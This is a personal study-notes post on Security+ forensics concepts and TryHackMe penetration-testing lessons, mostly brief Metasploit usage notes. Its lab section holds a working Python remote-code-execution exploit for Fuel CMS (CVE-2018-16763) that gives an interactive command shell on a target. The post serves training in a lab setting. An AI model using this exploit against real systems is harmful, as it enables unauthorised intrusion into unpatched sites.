ITPro.TV: CompTIA Security+ (SY0-601) & TryHackMe: Jr. Penetration Tester

author: Nathan Acks
date: 2022-04-13

ITPro.TV: CompTIA Security+ (SY0-601)

Digital Forensics Concepts

Order of volatility:

Preservation and documentation notes:

Chain of custody is often represented as a simple paper log/form.

Tools of the trade:

TryHackMe: Jr. Penetration Tester

Vulnerability Capstone

I couldn’t get any of the exploits from Exploit DB to work for me, so I wound up doing a web search that landed me on a write-up for this room in GitHub; the provided exploit code is a little rough, but can be cleaned up to produce nice output without too much work:

#!/usr/bin/python3

# Derived from https://github.com/SlizBinksman/THM-Vulnerability_Capstone-CVE-2018-16763/blob/main/rce.py

import argparse
import requests
from sys import exit
from bs4 import BeautifulSoup
from socket import error

delimeter1 = '<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">'
delimeter2 = '</div>'

def exploit():
	while True:
		try:
			payload = input("
[+] OS Command: ")
			response = requests.get(f"{args.URL}/fuel/pages/select/?filter='%2Bpi(%24a%3D('system'))%2B%24a('{payload}')%2B'")
			htmlText = str(BeautifulSoup(response.text,'html.parser'))
			array1 = htmlText.split(delimeter1)
			array2 = array1[1].split(delimeter2)
			print('
' + array2[-1].replace('

',''))

		except error:
			exit('
[-] Could Not Connect To Server')

if __name__ == '__main__':

	mainArguments = argparse.ArgumentParser()
	mainArguments.add_argument('URL',help='Target Website Hosting Vulnerable CMS',type=str)
	args = mainArguments.parse_args()

	try:
		exploit()
	except KeyboardInterrupt:
		exit('
[!] Quitting')

Main Components of Metasploit

Module categories:

Payloads, in turn, can be divided into:

Msfconsole

You can use msfconsole as a shell, but there’s no redirect functionality.

Use history to display a command history.

All settings are scoped to the current module unless explicitly scoped globally (set -g).

The show command can be used with any module type to list modules of that type, though Metasploit is a bit inconsistent about whether the type should be plural or not (show auxiliary vs. show exploits). When used in the context of a module, this usage of show will attempt to filter additional modules in a sensible way; for example, in the context of a Windows exploit, only Windows-based payloads will be shown.

The back command leaves the context of the current module.

Use info to get module information (which is not generally the same as “help”, though it often does contain useful informaiton).

We can limit the search query to a particular type of module using the type: parameter (e.g., search type:exploit wordpress).

Working with Modules

The common RHOSTS module option accepts IP addresses, ranges, CIDR networks, and even a file with one target per line (specify as file:/path/to/file.txt).

Note that the PAYLOAD and SESSION parameters are not generally listed by show options, but can still be set if desired.

You can reset individual parameters using unset, and reset the entire module using unset all.

Some exploit modules have a check option which attempts to determine if a target is vulnerable without actually exploiting it. Alternately, other modules have a paired auxiliary scanner. Many don’t have a check at all. YMMV!

Meterpreter sessions can be backgrounded using the background command, and all sessions can be backgrounded using CTRL + Z. List sessions using the sessions command, and foreground a session using session -i #, where # is the session number.